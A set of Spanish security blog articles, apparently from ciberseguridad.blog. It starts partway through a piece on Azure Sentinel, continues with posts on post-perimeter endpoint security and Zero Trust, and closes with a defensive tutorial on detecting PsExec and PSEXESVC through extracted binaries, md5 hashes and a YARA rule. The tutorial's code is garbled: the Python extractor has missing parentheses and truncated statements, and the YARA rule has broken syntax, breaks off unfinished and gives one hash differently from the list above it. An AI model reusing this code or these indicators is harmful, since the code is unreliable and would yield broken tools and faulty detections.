[Imagen: Diagrama de la Microsoft Intelligent Security Association con logotipos de Palo Alto, Zscaler y Check Point] Al usar la tecnología de paneles de control ya disponible en Azure Sentinel podemos ver un único dashboard sobre la seguridad de nuestro entorno. Y como resultado del dashboard, podremos obtener información detallada, así cómo un cuadro de mandos detallado como parte de nuestras investigaciones. [Imagen: Panel oscuro de Palo Alto con gráficos de tráfico, severidad y direcciones IP de origen] ### Azure Firewall es el ejemplo perfecto Pero no se detiene en obtener datos uniformes de la red cómo nuestros firewalls legacy. Microsoft acaba de anunciar nuevas capacidades en su propio Firewall de Azure, especialmente una característica llamada Filtrado basado en inteligencia de amenazas. > “El firewall de Azure ahora se puede configurar para alertar y denegar el tráfico hacia y desde las direcciones IP y dominios maliciosos conocidos casi en tiempo real. Las direcciones IP y los dominios se obtienen de la fuente de información de Microsoft Threat Intelligence mostrandose en Intelligent Security Graph ". El filtrado basado en inteligencia de amenazas está habilitado de forma predeterminada en el modo de alerta para todas las implementaciones de Azure Firewall, lo que proporciona el registro de todos los indicadores coincidentes. Los clientes podremos ajustar el comportamiento para alertar o bloquear (Esta última algo delicada , principalmente por miedo). [Imagen: Diagrama de arquitectura de Azure Firewall centralizando el tráfico entre redes spoke y on-premises] ## Conclusión sobre Azure Sentinel Joseph Blankenship dice sobre Sentinel: > Para los profesionales de la seguridad con experiencia, no permita que su cinismo bloquee las ventajas potenciales que su organización podría experimentar haciendo uso de Azure Sentinel. Quítate el sombrero de papel de aluminio y date cuenta de que ahora, Microsoft es una empresa de ciberseguridad. Lo que Google y Microsoft han introducido hará que toda la industria sea mejor, y eso es algo para aplaudir. El futuro de la ciberseguridad, al igual que los recursos de TI que protege, está en la cloud. Los Tech Titans están haciendo un reclamo y cambiando la forma en que se compran, entregan y consumen las soluciones de seguridad ... y no podrían presentarse en un mejor momento para la industria. ## Precio Azure Sentinel No habrá cargos específicos para Azure Sentinel durante la "vista previa" en la cual estamos aún. El típico caramelito que Microsoft se esta encargando de darnos, con el fin de veamos el potencial del mismo. El precio de Azure Sentinel se anunciará en el futuro y se enviará un aviso antes de que finalice la vista previa (Estar atentos, no os lleveis un susto si habeis estado jugando con la versión previa). Si decidimos seguir utilizando Azure Sentinel después del período de notificación, es entonces cuando recibiremos la facturara correspondiente. La importación de datos desde Office 365 es gratuita, pero para ello, debe ser un cliente con licencia de Office 365 para poder importar datos. Y por último, mucho ojo, Microsoft indica: Incluso durante la vista previa, se pueden incurrir en cargos adicionales relacionados con la ingesta de datos, flujos de trabajo de automatización o personalizaciones de modelos de aprendizaje automático. Pero que tampoco os presione. Disfrutad mucho, porque sentinel tiene muchisimo potencial y hablaremos de el mucho en un futuro, ya que son muchas las organizaciones que tienen parte de su arquitectura en una Cloud hibrida en Azure o AWS. --- # Llegó la era post-perímetro y la ciberseguridad del endpoint URL: https://ciberseguridad.blog/llego-la-era-post-perimetro-y-la-ciberseguridad-del-endpoint/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2019-06-23 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > Los atacantes han cambiado su enfoque fuera del perímetro tradicional. La adopción Zero Trust es inminente, llega la era Post-Perímetro en ciberseguridad. Has leído el titular del post, y algo te has asustado. Pero es normal, seguramente habrás pasado años construyendo defensas perimetrales contra los ataques cibernéticos. Con una combinación estratégica de redes privadas virtuales (VPN) divididas incluso por entornos, sistemas de prevención y detección de intrusos IDS/IPS , Firewalls, antivirus y sistemas SIEM, creando un "foso" alrededor de nuestra red que mantenga alejados, o al menos lo intente, incluso a los atacantes avanzados. Hasta hace poco, que con las aplicaciones basadas en cloud y el teletrabajo convertido en normalidad, hace que ya no baste con centrarse en las defensas del perímetro. De hecho, el claro perímetro alrededor de los valiosos activos se ha difuminado hasta el punto de que necesitamos un enfoque completamente nuevo en ciberseguridad. Hemos entrado en la era post-perímetro de la ciberseguridad. Para mantener los datos protegidos, debemos cambiar el enfoque a la seguridad endpoint multicapa. ## Las tendencias que han cambiado la naturaleza de los ciberataques. Los atacantes siempre buscan explotar el eslabón más débil de la red. Pero después de décadas de defensas de ciberseguridad en evolución y una mayor concienciación de los empleados, nuestro perímetro ha pasado a un segundo plano, y ya no es el eslabón más débil. A día de hoy, hay tres tendencias de trabajo que están cambiando la naturaleza de los ciberataques: - BYOD: Permitir que los empleados utilicen dispositivos personales para el trabajo ha creado una "historia perfecta de productividad". Los dispositivos personales pueden aumentar la productividad en un 34% y ahorrar casi una hora improductiva por día. Estos dispositivos personales brindan a los atacantes, nuevos puntos de entrada a su red a la vez que ocultan el perímetro de su red. [Vídeo](https://www.youtube.com/watch?v=W2L7PIMGtYQ) - Teletrabajo: Los avances en la tecnología han facilitado a los empleados hacer su trabajo fuera de su sede. El 60% de los trabajadores con teletrabajo a tiempo parcial dicen que dejarían sus trabajos para ocupar un puesto de teletrabajo a tiempo completo. El teletrabajo niega la efectividad de las herramientas de seguridad perimetral, porque los empleados no están dentro de los muros de sus defensas típicos de ciberseguridad. - Aplicaciones Cloud: estudios muestran, que el 83% de las cargas de trabajo empresariales pasarán a la cloud en 2020. Sin embargo, el 66% de los profesionales TI dicen que la seguridad es su mayor preocupación con esta nueva realidad. Sin una forma de asegurar las conexiones a estas aplicaciones, los atacantes pondrán en peligro la red independientemente de la inversión en ciberseguridad del perímetro. Los atacantes ya no están adoptando los enfoques tradicionales para entrar en las defensas perimetrales. En su lugar, se están dirigiendo a los dispositivos endpoint, comprometiendo la actividad vulnerable del navegador de Internet y utilizando la ingeniería social para obtener las credenciales de los empleados, consiguiendo así acceso a la red. Los atacantes se han adaptado mucho más rápido que la mayoría de las compañías. Por ello, si no te has alejado de las defensas perimetrales tradicionales, podríamos experimentar algún que otro susto. ## Los ataques en endpoints están en aumento El cambio de los ataques de ciberseguridad tradicionales a los ataques de endpoints que aprovechan las nuevas tendencias en el puesto de trabajo es algo que ya ha llegado. Un estudio realizado en 2018 por el Instituto Ponemon encontró que el estado actual de la seguridad en endpoints, no es lo suficientemente fuerte como para soportar ataques modernos. El estudio descubrió que el software antivirus tradicional no detectó el 57% de los ataques y que a los equipos de TI les llevó un promedio de 102 días corregir las vulnerabilidades de dichos equipos. Al adaptarnos a las nuevas vulnerabilidades con una estrategia de seguridad endpoint de múltiples capas, podemos obtener beneficios de productividad y rentabilidad sin sacrificar la protección de los datos. ## Seguridad en el endpoint en la era post-perimetral. El hecho de que los atacantes hayan cambiado su enfoque fuera del perímetro tradicional de la red, no significa que debamos deshacernos de las soluciones de seguridad existentes. Sin embargo, las defensas de perímetro son solo una capa del enfoque de múltiples capas que ahora es necesario para proteger nuestros datos. Debemos aplicar un nuevo modelo (Zero trust) tanto a las defensas perimetrales como a la estrategia de seguridad en endpoints. En lugar de asumir que se puede confiar en el tráfico interno, un modelo de confianza cero requiere la verificación de cada usuario y cada dispositivo que accede a los recursos. Por ejemplo, tenemos un reciente caso de la nasa muy relacionado con la confianza cero en los dispositivos. Con todos estos nuevos endpoints accediendo a la red, esta es la única forma de evitar que la actividad maliciosa evada nuestras defensas. Los firewalls y soluciones antivirus de próxima generación, depende por ejemplo, de una estrategia de seguridad endpoint de múltiples niveles y sin confianza : - Filtrado de URLs: Restringe el tráfico web para evitar que los usuarios accedan a sitios maliciosos conocidos que podrían llevar a credenciales y endpoints comprometidos. Vemos un ejemplo con configuración de filtrados url con pfSense y Squid proxy: [Vídeo](https://www.youtube.com/watch?v=G0vXqKwXpL0) - Detección de endpoints: Debemos supervisar continuamente los endpoints para detectar actividades sospechosas y enviar respuestas en tiempo real cuando se detecte un comportamiento inusual (potencialmente malicioso). - Controles de acceso remoto: Debemos asegurar las conexiones remotas con puertas de enlace reforzadas y conexiones VPN, implementar autenticación de dos factores para todos los usuarios y dispositivos, registrar todas las sesiones remotas e implementar una solución de acceso remoto sin cliente para que no haya software en el que los atacantes puedan poner en peligro. - Aislar el navegador: Debemos elegir una solución de aislamiento de navegador remoto para ejecutar código activo ejecutable del navegador dentro de un entorno aislado, protegiendo así a los usuarios de los ataques de Zero Day, descargas no autorizadas y otro contenido web malicioso. En los primeros días de la implantación de los programas BYOD y el teletrabajo, las empresas tradicionales se resistían por temor a incidentes de seguridad que conllevasen importantes costos. Pero ahora, se han convertido en necesidades tanto para la experiencia de los empleados como para la productividad. En lugar de luchar contra las tendencias del puesto de trabajo, debemos actualizar una estrategia de seguridad y adaptarnos a los cambios. Con el tipo de modelo de seguridad de múltiples niveles de zero trust que se describen en el post, podremos adaptarnos continuamente a los nuevos vectores de amenazas y evitar que los atacantes pongan en peligro nuestros datos más confidenciales. --- # ¿ Que es Zero Trust en ciberseguridad ? URL: https://ciberseguridad.blog/que-es-zero-trust-en-ciberseguridad/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2019-06-14 Actualizado: 2026-10-08 > Zero Trust Security descarta la idea de que deberíamos tener una red interna "confiable" y una red externa "no confiable", !EL FUTURO DE LA CIBERSEGURIDAD¡ Un nuevo paradigma para un mundo cambiante. Un cambio de paradigma significativo está ocurriendo en los últimos años. Al igual que otros cambios tecnológicos de la última década: cuando la computación en la nube cambió la forma en que hacemos negocios, la metodología agile cambió la forma en que desarrollamos software y Amazon cambió la forma en que compramos: Zero Trust nos presenta un nuevo paradigma en la forma en que protegemos a nuestras organizaciones, nuestros datos y nuestros empleados. Si bien es difícil identificar el punto de inflexión, una cosa es cierta: lo que en una época fue extraordinariamente difícil, hoy se ha convertido en el día a día. Las violaciones de datos ya no son extraordinarias. En los últimos años, Yahoo!, Accenture, HBO, Verizon, Uber, Equifax, Deloitte, HP, Oracle …. y una gran cantidad de ataques dirigidos nos han mostrado que cualquier organización, ya bien sea pública o privada es susceptible a ataques. Detrás del cambio de paradigma, enfoques de seguridad ampliamente aceptados basados ​​en reforzar una red de confianza que no funciona y muy posiblemente nunca lo harán. Especialmente cuando las empresas están lidiando con la escasez de habilidades, empleados desbordados y un número cada vez mayor de aplicaciones cloud y dispositivos móviles que amplían la superficie de ataque día tras día. Se requiere un enfoque completamente nuevo, una forma de ver las cosas distinta y nueva que está tomando gran aceptación dentro del mundo de la ciberseguridad: Zero Trust. [Vídeo](https://www.youtube.com/watch?v=uwdZuxO6RRk) ## Un cambio de visión con Zero Trust Security La seguridad perimetral tradicional dependía de firewalls, VPN y gateways para separar las zonas de confianza de los usuarios no confiables. Pero a medida que los "empleados móviles" comenzaron a acceder a la red a través por su propia cuenta, con sus propios dispositivos, se empezaron a crear perímetros borrosos. Y como inri, estos perímetros prácticamente desaparecieron con el auge de la computación cloud y los dispositivos IoT. Podríamos decir que estamos en ese momento, donde los beneficios de estas tecnologías superan los riesgos percibidos. Unido a este momento, los cibercriminales vieron la oportunidad. En los últimos años, las empresas se han enfrentado a la amenaza de pérdidas devastadoras, y los proveedores de seguridad legacy no tenían respuestas. La atención se centró en analistas de seguridad de TI, potencias industriales y empresas de seguridad innovadoras. La conclusión es "Confianza Cero en seguridad". ## Lo que dicen los analistas de Zero Trust Security Forrester ha sido durante mucho tiempo un defensor de una estrategia Zero Trust, al afirmar que: > "Los CIO deben avanzar hacia un enfoque Zero Trust para la seguridad centrada en los datos y la identidad, siendo desde nuestro punto de vista el único enfoque de seguridad que funciona". Para Forrester, Zero Trust sugiere que las organizaciones deberían: > "Nunca asumir la confianza, incluso con los usuarios de confianza ". Las interacciones precipitaron e incluso facilitaron los ataques. Las mismos credenciales en accesos de usuarios y administradores fueron las vías a través de las cuales los cibercriminales obtuvieron acceso sin restricciones a la red . Gobernar el acceso de los usuarios es clave para el éxito: al igual que con la seguridad de la red y la metodología Zero Trust, debe identificar, segmentar y analizar a sus usuarios para cambiar a su favor. Tus usuarios tienen roles y necesidades de trabajo que hacen que el negocio funcione, debemos analizar esos roles y necesidades y luego segmentarlos para poder habilitar "Zero Trust". Forrester sugiere además que las capas clave de Zero Trust deben incluir: - Gestión de la identidad y gobierno para apoyar el principio de privilegio mínimo - Gestión de identidad privilegiada para garantizar Zero Trust para los usuarios administrativos - Autenticación de dos factores (2fA) para reducir el riesgo de compromiso de credenciales La metodología CARTA recomendada por Gartner tiene un enfoque más amplio, pero contiene muchos de los elementos centrales de Zero Trust Security. ## Google se acerca a Zero Trust No solo es la teoría defendida por los analistas, Google ha puesto en marcha Zero Trust con su proyecto BeyondCorp. Al reconocer la necesidad de un cambio, la compañía comenzó a modificar sus propias políticas de seguridad de red para reflejar un modelo de "confianza cero" en 2015, esencialmente manejando su red interna como lo haría en la inseguraridad de internet. El modelo BeyondCorp de Google elimina completamente la confianza de la red, identifica de forma segura el dispositivo y el usuario, y aplica controles de acceso dinámico, políticas de privilegios mínimos y conscientes del contexto. Si bien no tienen una solución completa para los clientes, han proporcionado lo que muchos analistas de seguridad consideran que es la arquitectura de referencia más convincente hasta la fecha. El enfoque de Google BeyondCorp refleja a la perfección el enfoque de Zero Trust. ## ¿Qué es Zero Trust Security? El modelo de seguridad de Zero Trust asume que los actores que no son de confianza ya existen dentro y fuera de la red. Por lo tanto, la confianza debe ser completamente eliminada de la ecuación. Zero Trust Security requiere poderosos servicios de identidad para asegurar el acceso de cada usuario a las aplicaciones e infraestructura. Una vez que se autentica la identidad y se prueba la integridad del dispositivo, se concede la autorización y el acceso a los recursos, pero con el privilegio suficiente para realizar la tarea en cuestión. En lugar del viejo adagio "confía pero verifica", el nuevo paradigma es "nunca confíes, verifica siempre". La seguridad efectiva de Zero Trust requiere una plataforma de identidad unificada que consta de cuatro elementos clave dentro de un solo modelo de seguridad. Combinados, estos elementos ayudan a garantizar un acceso seguro a los recursos mientras que reducen significativamente la posibilidad de acceso de los malos. Para implementar la confianza cero en seguridad, las organizaciones deben: 1. Verificar el usuario 2. Verificar su dispositivo. 3. Limitar el acceso y privilegio 4. Aprender y adaptar Este enfoque debe ser implementado en toda la organización. Ya sea que esté dando a los usuarios acceso a las aplicaciones o a los administradores acceso a los servidores, todo se reduce a una persona, un punto final y un recurso protegido. Los usuarios incluyen a sus empleados, pero también a los proveedores y socios comerciales que tienen acceso a sus sistemas. Complicar el entorno con diferentes sistemas para diferentes situaciones es innecesario, y distintas herramientas pueden introducir brechas en la seguridad. ## Cuatro claves de la seguridad Zero Trust Los siguientes son bloques de construcción que, cuando se unifican, proporcionan un camino para lograr la confianza cero en seguridad. [Imagen: Curva de madurez Zero Trust con cuatro etapas hasta la fuerza laboral adaptativa] ### 1. Verificar el Usuario Hoy en día, la forma más básica de verificar a un usuario es a través de un nombre de usuario y contraseña. Pero, ¿cómo podemos estar seguros de que el usuario es quien dice ser y no alguien que adivinó o falsificó la contraseña o compró credenciales comprometidas en la Dark Web? Se obtiene una seguridad de identidad adicional al mejorar las contraseñas con la autenticación multifactor (MFA), que usa algo que tiene, algo que sabes o algo que eres. El nivel de confianza ganado a través de pasos de verificación adicionales determina parcialmente si se otorga el acceso y a qué nivel específico. Los principios Zero Trust se aplican independientemente del tipo de usuario (usuario final, usuario privilegiado, TI subcontratado, socio o cliente) o el recurso al que se accede (aplicación o infraestructura). Las decisiones de acceso deben ser adaptativas y dinámicas. ### 2. Verificar el dispositivo Para lograr Zero Trust Security, los controles preventivos centrados en la identidad deben extenderse hasta el endpoint. Al igual que con los usuarios, no se puede confiar en los dispositivos sin verificar. La verificación de un dispositivo implica que el usuario verificado inscriba su dispositivo para que se reconozca. Si el usuario solicita acceso desde un dispositivo registrado que usa todos los días, tiene un cierto nivel de confianza. Si intentan acceder a los servicios desde una estación de trabajo en un cibercafé que nunca han usado antes, la confianza está fuera. La verificación de los dispositivos también implica asegurarse de que solo se permita el acceso a los dispositivos si cumplen con ciertos requisitos de seguridad: ¿Han sido registrados? ¿Se ajustan las configuraciones del dispositivo a las políticas de la empresa, como el cifrado de disco, la protección contra virus y los parches actualizados? ### 3. Limitar el acceso y los privilegios Los privilegios de usuario deben ser administrados con mucho control. Las partes malintencionadas frecuentemente se dirigen al personal con privilegios administrativos para obtener control sobre los sistemas de negocio. Primero, con Zero Trust Security, es importante limitar el movimiento lateral dentro de todos los recursos, como servidores y estaciones de trabajo, limitando a los usuarios solo al acceso que necesitan para realizar sus trabajos. La segunda es la autorización en aplicaciones de negocios. Debido a que estas aplicaciones a menudo contienen grandes cantidades de datos críticos y debido a que generalmente son accedidas por más usuarios dentro de la organización, pueden ser objetivos más fáciles para los atacantes. Por lo tanto, es igualmente importante proporcionar solo acceso suficiente dentro de cada aplicación para que los usuarios hagan su trabajo. Supongamos que un atacante inicia sesión en una base de datos utilizando credenciales robadas. Los privilegios del usuario se limitan al mínimo, el atacante también se limitará a lo que pueden acceder.Cuanto más críticos son los datos, menos privilegios, y con un mayor uso de MFA para garantizar la identidad. ### 4. Aprende y adapta Al igual que Gartner ha sugerido con su enfoque CARTA, Zero Trust Security debe mejorar continuamente mediante el aprendizaje y la adaptación. La información sobre el usuario, el endpoint, las aplicaciones o el servidor, las políticas y todas las actividades relacionadas con ellos se pueden recopilar y enviar a un conjunto de datos que alimente el aprendizaje automático. Luego, el sistema puede reconocer automáticamente comportamientos fuera de lo común, como un usuario que intenta acceder a los recursos desde una ubicación inusual, lo que inmediatamente provoca una señal de advertencia que puede requerir una segunda forma de autenticación, todo dependerá de las políticas. Los análisis de comportamiento se utilizan para determinar el nivel de riesgo de las transacciones individuales y decidir en tiempo real si las permite o no, proporcionando servicios de identidad con información clave que podemos indicar a los administradores. ## Beneficios de Zero Trust El paradigma Zero Trust se mueve de la seguridad basada en la red a la identidad y basada en la aplicación, equilibrando dinámicamente la experiencia del usuario con el riesgo y permitiendo a las empresas adoptar una infraestructura libre de perímetro. Este enfoque de seguridad minimiza la exposición y aumenta el cumplimiento al garantizar el acceso a las aplicaciones y la infraestructura para todos los usuarios, ademas: - No deja huecos al cubrir la gama más amplia de superficies de ataque, desde usuarios hasta endpoints, redes y recursos. - Permite a las organizaciones aumentar la agilidad empresarial a través de la adopción segura de la cloud y las soluciones móviles. - Proporciona un marco para administrar adecuadamente el riesgo de exponer aplicaciones sensibles e infraestructura a "socios comerciales". - Asegura la visibilidad de TI del riesgo en sus controles de acceso y puede identificar automáticamente la "aguja en el pajar " de riesgo potencial a través de un comportamiento anormal que nunca sería detectado a través métodos forenses manuales. - Crea usuarios satisfechos y productivos al garantizar que se aplican los controles adecuados para abordar niveles apropiados de riesgo sin requerir un enfoque de control máximo y de mano dura. - Requiere menos administración, habilidades y costes que una defensa enfocada en silos o recursos --- # Detectando PSEXEC y PSEXESVC en los equipos URL: https://ciberseguridad.blog/detectando-psexec-y-psexesvc-en-los-equipos/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2019-05-31 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > Cuando se habla de movimientos laterales y herramientas legítimas, nos viene a la cabeza PSEXEC. Hoy veremos cómo poder detectar su uso. ! DISFRUTA ¡ Hola a todos. Cuando se habla de movimientos laterales y herramientas legítimas, nos viene a la cabeza PSEXEC (otras posibles técnicas para conseguir lo mismo serían WMI y/o WinRM). Según podemos leer en la página de Microsoft: PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. PsExec's most powerful uses include launching interactive command-prompts on remote systems and remote-enabling tools like IpConfig that otherwise do not have the ability to show information about remote systems. La forma de utilizar la herramienta es la siguiente: psexec [\\computer[,computer2[,...] | @file\]][-u user [-p psswd][-n s][-r servicename][-h][-l][-s|-e][-x][-i [session]][-c executable [-f|-v]][-w directory][-d][-][-a n,n,...] cmd [arguments] Más información sobre su funcionamiento la podéis leer en la propia página de la herramienta. Lo interesante de ella es ¿cómo lo hace? Ejecuta cualquier comando o aplicación de forma remota introduciéndole unas credenciales. Sin duda, es interesante y vamos a ver porqué. Lo primero que hay que decir es que la herramienta funciona siempre y cuando seas administrador del equipo remoto. Necesitas copiar algo en un directorio en los que se necesitan permisos. [Imagen: Código ensamblador desensamblado mostrando referencias a lpUserName, lpPassword y la función GetSystemDirectoryW] ¿Pero que tenemos que copiar ahí? Ni más ni menos que un recurso que se encuentra dentro de PSEXEC.exe. [Imagen: Código desensamblado con las llamadas FindResourceW, LoadResource y LockResource sobre el recurso BINRES] Si abrimos el ejecutable con un Editor de Recursos encontramos el fichero que será copiado al directorio de Windows (API GetSystemDirectoryWo “\\ip_o_hostname\admin$\psexesvc.exe”). [Imagen: Editor de recursos mostrando en hexadecimal la cabecera MZ del binario PSEXESVC] Ese es el fichero que se ejecutará en la máquina remota como un servicio. Hablamos ya de la máquina remota, cuando se ejecuta la aplicación con el parámetro “-install” se crea el servicio correspondiente ejecutado con la cuenta del sistema y apuntando al fichero que se encuentra en c:\windows (recuerda que se copia en “\\ip_o_hostname\admin$\psexesvc.exe”). Si copias a mano ese fichero en otra ruta y lo ejecutas con el parámetro mencionado, se crea el servicio apuntando a esa otra ruta (siempre en donde se encuentre ubicado). Las opciones de este ejecutable son: >psexesvc.exe PsInfSvc -install to install the service PsInfSvc -remove to remove the service PsInfSvc -debug to run as a console app for debugging Si se instala como servicio se creará la siguiente clave de registro: HKLM\SYSTEM\CurrentControlSet\Services PSINFSVC [Imagen: Editor del registro de Windows mostrando la clave PSINFSVC con ImagePath psexesvc.exe] Ahora ya solamente queda esperar los comandos que quieran ejecutar en dicha máquina. Realmente, si encontráis un “psexec.exe” en una máquina, no es un problema, eso significa que desde ahí se puede establecer una conexión contra otra/s máquina/s. Sin embargo, si lo que encontráis es un “psexesvc.exe”, ya no sólo dentro de Windows sino en cualquier otro lugar (en este caso tiene que estar en ejecución), eso significaría que ya han accedido a esa máquina, podría estar comprometida. Hay muchas versiones de la suite de Sysinternals, en cada una puede que ese fichero sea distinto y los queremos todos. Vamos a conseguirlos ;-) Queremos detectarlas todas. Vamos a la web oficial de Microsoft: [Imagen: Página de documentación de Microsoft con el enlace de descarga de Sysinternals Suite] Y copiamos el enlace, suponiendo que siempre es el mismo en archive.org, tiene este aspecto: [Imagen: Calendario de Wayback Machine con capturas del año 2018 de SysinternalsSuite.zip] En azul, vemos los días en los que se hizo una captura del contenido. En 2017, por ejemplo hay muchos más. [Imagen: Calendario de Wayback Machine con capturas del año 2017 de SysinternalsSuite.zip] Todos estos, son diferentes versiones (o no, ya lo veremos después). Son las que están disponibles para descargar. El siguiente paso sería ver como son los enlaces. [Imagen: Herramienta de interceptación mostrando peticiones a la API calendarcaptures de Wayback Machine] Toca parsear (nos interesan los "ts":[fecha]): [Imagen: Fragmento JSON ampliado con las capturas por año del fichero SysinternalsSuite.zip en Wayback Machine] Confeccionamos la URL de descarga, teniendo en cuenta que hay versiones desde 2006 a 2018: for i in {2006..2018}; do curl -s -A "Mozilla 4.0" -k "https://web.archive.org/__wb/calendarcaptures?url=https%3A%2F%2Fdownload.sysinternals.com%2Ffiles%2FSysinternalsSuite.zip&selected_year="$i | grep "^\[" | sed 's/\"ts\"/\n\"ts\"/g' | grep "^\"ts\"" | awk -F"[" '{print $2}' | awk -F"]" '{print $1}' | sed 's/,/\n/g' | awk '{system ("wget https://web.archive.org/web/"$1"if_/https://download.sysinternals.com/files/SysinternalsSuite.zip -O SysinternalsSuite-"$1".zip")}'; done Y a esperar un rato a que todo se descargue, puedes tomarte un café, coca-cola o lo que quieras, tienes un rato. [Imagen: Terminal en español descargando con wget copias antiguas de SysinternalsSuite.zip desde web.archive.org] Ya las tenemos todas descargadas. [Imagen: Explorador de archivos con decenas de ficheros SysinternalsSuite.zip descargados de distintas fechas] De esta forma tendríamos todas las Suite de Sysinternals para sacar los hashes md5 de sus ejecutables o lo que nos interesa en nuestro caso concreto (he usado la suite en lugar del ejecutable, que también está la URL directa disponible porque salen muchas más versiones en archive.org). Una vez descomprimidas todas ellas nos queda extraer el binario que hace de servidor (por así decirlo). Para ello he programado este script (hacerlo a mano es una locura): import sys import os import re import pefile if len(sys.argv) > 1: path = sys.argv[1] else: print "You need a file" print "PSEXESVC extractor - by Rafa" exit(1) def find_pe(data): while len(data): mz_start = data.find('MZ') if mz_start == -1: return None data = data[mz_start:] pe = data.find('PE') if pe != -1: return data return None def dump_to_file(filename, data): with open(filename, 'wb') as f: f.write(data) def get_rsc(pe,pred): def walk_rsc(d): if pred(pe,d): x = d.data.struct return pe.get_data(x.OffsetToData,x.Size) if not hasattr(d,'directory'): return None for d in d.directory.entries: r = walk_rsc(d) if r: return r for d in pe.DIRECTORY_ENTRY_RESOURCE.entries: r=walk_rsc(d) if r:return r def rsc_pred(pe,d): return hasattr(d,'data') def main(): if os.path.exists(path): pe = pefile.PE(sys.argv[1] inner_exe = open(sys.argv[1]).read() print '[+] Extracting resource inner_res =get_rsc(pe,rsc_pred fname = 'PSEXESVC.exe' print '[+] Save resourse like ', fname with open( fname,'w') as f f.write(inner_res) data = bytearray(open(fname, 'rb').read() dump_to_file(fname, data) print "[+] File dumped: %s" % (fname pe_data = find_pe(data) if pe_data is None print "[+] It's not a PE file!" retur if os.path.exists(fname): print "[+] Finished: " + fname + " extracted." else: print "[+] Finished with errors." pe_data = find_pe(data) if pe_data is None: return else: print "File \"" + path + "\" not exist." exit(1) if __name__ == '__main__': main() Su uso es bien sencillo: $ python extract-psexesvc.py psexec.exe [+] Extracting resource [+] Save resourse like PSEXESVC.exe [+] File dumped: PSEXESVC.exe [+] Finished: PSEXESVC.exe extracted. Tenemos un montón de versiones: $ find . -iname "psexec.exe" ./sysinternals/20171121052032/PsExec.exe ./sysinternals/20070123230553/psexec.exe ./sysinternals/20160610232411/PsExec.exe ./sysinternals/20070104200744/psexec.exe ./sysinternals/20161220065806/PsExec.exe ./sysinternals/20120112064343/PsExec.exe ./sysinternals/20160331150947/PsExec.exe ./sysinternals/20160303071325/PsExec.exe ./sysinternals/20161129052051/PsExec.exe ./sysinternals/20160903091120/PsExec.exe ./sysinternals/20100201154325/psexec.exe ./sysinternals/20110815082858/PsExec.exe ./sysinternals/20170308221855/PsExec.exe ./sysinternals/20170117061351/PsExec.exe ./sysinternals/20120303053843/PsExec.exe ./sysinternals/20180412141809/PsExec.exe ./sysinternals/20170103065049/PsExec.exe ….. Vamos a dejarlo todo accesible para el script: $ find . -iname "psexec.exe" | awk -F"/" '{system("cp "$0" "$3"-"$4)}' $ ls 20061216013739-psexec.exe 20130921111433-PsExec.exe 20160812133548-PsExec.exe 20061220154430-psexec.exe 20131026140207-PsExec.exe 20160820092348-PsExec.exe20061220154430-psexec.exe 20131026140207-PsExec.exe 20160820092348-PsExec.exe 20061231003824-psexec.exe 20131227135802-PsExec.exe 20160827093432-PsExec.exe 20070104015111-psexec.exe 20140208010814-PsExec.exe 20160903091120-PsExec.exe 20070104200744-psexec.exe 20140214130348-PsExec.exe 20160913015021-PsExec.exe20070104200744-psexec.exe 20140214130348-PsExec.exe 20160913015021-PsExec.exe 20070109121140-psexec.exe 20140221133728-PsExec.exe 20160920041002-PsExec.exe …... Ahora ya podemos usar el script que está pensado para un único fichero. Al ejecutarlo se va extrayendo el recurso y se obtiene su hash md5: $ for i in 'ls *-*s*xec.exe'; do python extract-psexesvc.py $i;md5sum PSEXESVC.exe | sort -u; done …. [+] Extracting resource [+] Save resourse like PSEXESVC.exe [+] File dumped: PSEXESVC.exe [+] Finished: PSEXESVC.exe extracted. 75b55bb34dac9d02740b9ad6b6820360 PSEXESVC.exe [+] Extracting resource [+] Save resourse like PSEXESVC.exe [+] File dumped: PSEXESVC.exe [+] Finished: PSEXESVC.exe extracted. 75b55bb34dac9d02740b9ad6b6820360 PSEXESVC.ex De PSEXEC tenemos varias versiones: $ grep -i psexec.exe salida-psexec.txt | awk '{print toupper($1)}' | sort - 0C5BB01EA544AD94A0D73EC26F194771 27304B246C7D5B4E149124D5F93C5B01 36A95D7DCC1943F78AC370DAFE79D5AE 66470E0780A6C890A656EAE305045484 A7F7A0F74C8B48F1699858B3B6C11EDA AEEE996FD3484F28E5CD85FE26B6BDCD D0DF366711C8B296680002840336B6FD E13DBDE36CE556B634310399C1EFA257 Y de la aplicación que se utiliza como servicio: $ grep -v "^\[" salida2-psexec.txt | awk '{print toupper($1)}' | sort -u 4CC62CAE08D73BBAF197D755D1D07993 5C708DF7BC8349EC19FE0AE9D01C90EA 5CB94F11459DA45D647D888EF4438B5B 5F2541AEACCA3BB141A9062F38C68C7D 75B55BB34DAC9D02740B9AD6B6820360 87DFAC39F577E5F52F0724455E8832A8 A283E768FA12EF33087F07B01F82D6DD F19C18DB99D231F63935FCD7C6347219 Todas estas, por lo que tenemos los hashes de las aplicaciones para buscarlo en vuestros sistemas de detección que tengais. Con la siguiente regla yara puede detectarse por hash: import "hash rule detected_psexec { meta: description = "Detecting psexec - by Rafa" condition: uint16(0) == 0x5A4D an hash.md5(0, filesize) == "0c5bb01ea544ad94a0d73ec26f194771" or hash.md5(0, filesize) == "27304b246c7d5b4e149124d5f93c5b01" or hash.md5(0, filesize) == "36a95d7dcc1943f78ac370dafe79d5ae" or hash.md5(0, filesize) == "66470e0780a6c890a656eae305045484" or hash.md5(0, filesize) == "a7f7a0f74c8b48f1699858b3b6c11eda" or hash.md5(0, filesize) == "aeee996fd3484f28e5cd85fe26b6bdcd" or hash.md5(0, filesize) == "d0df366711c8b296680002840336b6fd" or hash.md5(0, filesize) == "e13dbde36ce556b634310399c1efa257" } rule detected_psexesvc { meta description = "Detecting psexesvc - by Rafa" condition: uint16(0) == 0x5A4D an hash.md5(0, filesize) == "4cc62cae08d73bbaf197d755d1d07991" or hash.md5(0, filesize) == "5c708df7bc8349ec19fe0ae9d01c90ea" or hash.md5(0, filesize) == "5cb94f11459da45d647d888ef4438b5b" or hash.md5(0, filesize) == "5f2541aeacca3bb141a9062f38c68c7d" or hash.md5(0, filesize) == "75b55bb34dac9d02740b9ad6b6820360" or hash.md5(0, filesize) == "87dfac39f577e5f52f0724455e8832a8" or hash.md5(0, filesize) == 